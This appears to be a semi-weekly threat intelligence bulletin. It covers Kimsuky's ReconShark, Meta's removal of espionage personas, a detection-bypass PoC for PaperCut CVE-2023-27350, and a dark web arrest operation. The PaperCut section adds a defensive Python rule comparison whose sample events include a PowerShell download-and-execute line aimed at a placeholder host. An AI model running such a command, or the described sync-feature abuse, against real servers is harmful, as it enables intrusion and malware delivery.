Malware Activity

North Korean Threat Group Kimsuky Observed Using New "ReconShark" Tool in Latest Campaign

Researchers have discovered Kimsuky, a North Korean state-sponsored threat group also tracked as APT43, using a new reconnaissance tool dubbed "ReconShark" in its latest campaign. The campaign targets government organizations, research centers, think tanks, and universities in the United States, Asia, and Europe. ReconShark is delivered through spear-phishing emails sent to specifically targeted individuals; the emails carry malicious OneDrive links that lead victims to download password-protected malicious documents whose filenames match the target's area of interest. Researchers assess ReconShark to be an evolution of "BabyShark," malware the group used in its campaigns in 2018, with expanded reconnaissance capabilities including "unique execution instructions and server communication methods." ReconShark exfiltrates information about the host, such as running processes, battery status, and the endpoint detection and protection products deployed on the machine. This capability matters because researchers suspect ReconShark is "part of a Kimsuky-orchestrated reconnaissance operation that enables subsequent precision attacks, possibly involving malware specifically tailored to evade defenses and exploit platform weaknesses." CTIX analysts will continue to monitor North Korean threat groups' activity and detail emerging malware as it is observed. Additional technical details as well as indicators of compromise (IOCs) can be viewed in the report linked below.

Threat Actor Activity

Meta Conducts Massive Campaign to Stop State-Sponsored Hackers from Conducting Cyber-Espionage Operations

Three distinct threat actors used hundreds of fake personas on Facebook and Instagram to target individuals in South Asia in separate cyber-espionage operations. These advanced persistent threat (APT) groups relied heavily on social engineering to deceive people into clicking malicious links or sharing personal information. The fake accounts impersonated recruiters, journalists, or military personnel and used traditional lures such as romantic connections. Two (2) of the cyber-espionage efforts employed low-sophistication malware, apparently to slip past the app verification checks run by Apple and Google. Meta, Facebook's parent company, identified and removed accounts linked to Pakistan-based and India-based APT groups that targeted military personnel and government employees in India and Pakistan. At least two (2) of these groups were identified as Patchwork APT and Bahamut APT, both of which operate in the South Asia sphere. Meta purged 110 Facebook accounts connected to Bahamut and fifty (50) connected to Patchwork. Both groups distributed malicious apps through the Google Play Store, some of them disguised as VPN apps. Additionally, Meta disrupted six adversarial networks operating from countries including the U.S., Venezuela, Iran, China, Georgia, Burkina Faso, and Togo, which engaged in "coordinated inauthentic behavior" on Facebook and other social media platforms. These geographically diverse networks set up fake news media brands, hacktivist groups, and NGOs to establish credibility. Some were linked to marketing firms and strategic communication departments in various countries. Two Chinese networks targeted users in India, Tibet, Taiwan, Japan, and the Uyghur community through fraudulent accounts on Facebook and Instagram. Meta took down the threat actor accounts and pages before they could gain significant traction.
Separately, an Iranian network focused on Israel, Bahrain, and France was also discovered and had its accounts purged. Iranian state-sponsored activity has been linked to twenty-four (24) such campaigns in 2022, up from seven (7) in 2021.

Vulnerabilities

Researchers Publish PoC for Bypassing Detection Measures for the Exploitation of the PaperCut Vulnerability

UPDATE: Researchers have published a new proof-of-concept (PoC) that bypasses the detection measures published for exploitation of a known vulnerability affecting servers running the PaperCut print management solution. The flaw, tracked as CVE-2023-27350 (CVSS score: 9.8/10), is an improper access control vulnerability that allows remote attackers to bypass authentication and achieve remote code execution (RCE), for example by running Windows PowerShell commands or dropping malicious Java archive (JAR) files on servers running vulnerable instances of PaperCut NG and MF. The flaw is being actively exploited by multiple threat groups, including Cl0p and LockBit, to drop ransomware and other malware payloads. In the published PoC, the researchers explain that in previous attacks, whether the threat actors ran PowerShell or dropped JAR files, the activity left distinct footprints and log entries on the victim machines, and the detection guidance published so far keys on those artifacts, for instance the PaperCut server process spawning PowerShell. The PoC instead abuses the "User/Group Sync" feature, which synchronizes user and group information from Active Directory (AD), Lightweight Directory Access Protocol (LDAP), or a custom source. The custom source option lets an administrator specify the program PaperCut should call for authentication and synchronization, and that program can be any executable. Using this path, the researchers launched a Python reverse shell on Linux servers and downloaded and ran a custom reverse shell on Windows servers without triggering any of the published detections. VulnCheck security researcher Jacob Baines noted that once the authentication bypass grants administrator access to the web interface, an attacker can reach code execution through several different built-in features, so defenders cannot rely on catching just one of them.
Detection logic should therefore not focus on a single code execution method or set of methods; a rule keyed on the PaperCut server process spawning any unexpected child process is more robust than one keyed on PowerShell or JAR drops alone, and applying the vendor's patched release and restricting network access to the PaperCut web management interface remain the only reliable prevention. This is a dynamic matter that has been changing quickly, and CTIX analysts will continue to monitor the situation, providing relevant updates to our readers in the future.
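
The following is an added example, not code from the original article or from VulnCheck. It runs two detection rules over constructed Sysmon-style process-creation events to show why a rule keyed on pc-app.exe (the PaperCut NG/MF Windows application server process) spawning cmd.exe or PowerShell misses post-exploitation that launches a different program, such as a binary registered as a custom User/Group Sync source, while a rule keyed on the parent process catches both. The baseline child-process allowlist, the file paths, and the command lines are assumptions made for the example.

```python
"""
Added example (not from the original article or from VulnCheck): compare a
narrow and a broad detection rule for CVE-2023-27350 post-exploitation
over constructed process-creation events.
"""
from dataclasses import dataclass

# PaperCut NG/MF's Windows application server process.
PAPERCUT_SERVER = "pc-app.exe"

# Narrow rule: the child processes early public detections looked for.
NARROW_CHILDREN = {"cmd.exe", "powershell.exe"}

# Broad rule allowlist: children seen during normal operation. This set is
# an assumption for the example; build the real one from a baseline of
# your own server.
EXPECTED_CHILDREN = {"conhost.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """Fields pulled from a Sysmon Event ID 1 (process creation) record."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def narrow_rule(ev: ProcEvent) -> bool:
    """Alert only when pc-app.exe spawns cmd.exe or powershell.exe."""
    return (basename(ev.parent_image) == PAPERCUT_SERVER
            and basename(ev.image) in NARROW_CHILDREN)


def broad_rule(ev: ProcEvent) -> bool:
    """Alert when pc-app.exe spawns anything outside the baseline."""
    return (basename(ev.parent_image) == PAPERCUT_SERVER
            and basename(ev.image) not in EXPECTED_CHILDREN)


def evaluate(events, rule):
    """Return the command line of every event the rule fires on."""
    return [ev.command_line for ev in events if rule(ev)]


# Constructed sample events; paths and command lines are illustrative only.
SAMPLE_EVENTS = [
    # Classic post-exploitation: PowerShell launched by the app server.
    ProcEvent(r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage')\""),
    # Benign console host child, part of the assumed baseline.
    ProcEvent(r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
              r"C:\Windows\System32\conhost.exe",
              r"\??\C:\Windows\System32\conhost.exe 0x4"),
    # Custom User/Group Sync program pointed at an attacker-dropped binary
    # (constructed path); no cmd.exe or PowerShell is involved.
    ProcEvent(r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
              r"C:\Windows\Temp\sync.exe",
              r"C:\Windows\Temp\sync.exe all-users"),
    # PowerShell started by a user from Explorer: unrelated to PaperCut.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Process"),
]


if __name__ == "__main__":
    for name, rule in (("narrow", narrow_rule), ("broad", broad_rule)):
        hits = evaluate(SAMPLE_EVENTS, rule)
        print(f"{name} rule: {len(hits)} hit(s)")
        for cmd in hits:
            print("   ", cmd)
```

The narrow rule fires once (the PowerShell child) and never sees the custom sync binary; the broad rule fires on both and stays quiet for the baseline child and for PowerShell launched from Explorer. The cost of the broad rule is tuning the allowlist from a real baseline, which is the work a single-method detection skips.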

Honorable Mention

International Law Enforcement Operation, SpecTor, Leads to the Arrest of 288 Dark Web Vendors

Efforts by U.S. and European governments to dismantle dark web vendors and their infrastructure continue. This time, the Federal Bureau of Investigation and Europol, along with police in the UK, France, Poland, Germany, Austria, Brazil, and Switzerland, conducted an international law enforcement operation codenamed "SpecTor" that led to the arrest of 288 dark web vendors and buyers. Additionally, police seized $53.4M in cash and cryptocurrency, as well as 1,874 pounds of narcotics and 117 firearms. The arrests stem from evidence gathered after the secret takedown of the Monopoly marketplace by German authorities in December of 2021, along with information obtained in additional recent dark web takedowns and the help of cryptocurrency tracing tools. Since then, Europol has been compiling intelligence packages from the evidence provided by German authorities to pinpoint major vendors and customers who were highly active on the Monopoly market and other illicit marketplaces. Using this data, investigators assembled a list of high-value targets who had engaged in tens of thousands of sales of illicit goods across Europe, the United States, and Brazil; those targets were then arrested in the coordinated police effort in their respective countries. The most arrests were made in the U.S., totaling 153, followed by the UK with fifty-five (55), Germany with fifty-two (52), the Netherlands with ten (10), Austria with nine (9), France with five (5), Switzerland with two (2), Poland with one (1), and Brazil with one (1). CTIX analysts will continue to monitor further crackdowns on criminal cryptocurrency transactions and the online criminal marketplaces that enable them.

The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the Flash Team (flash@ankura.com) if additional context is needed.

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.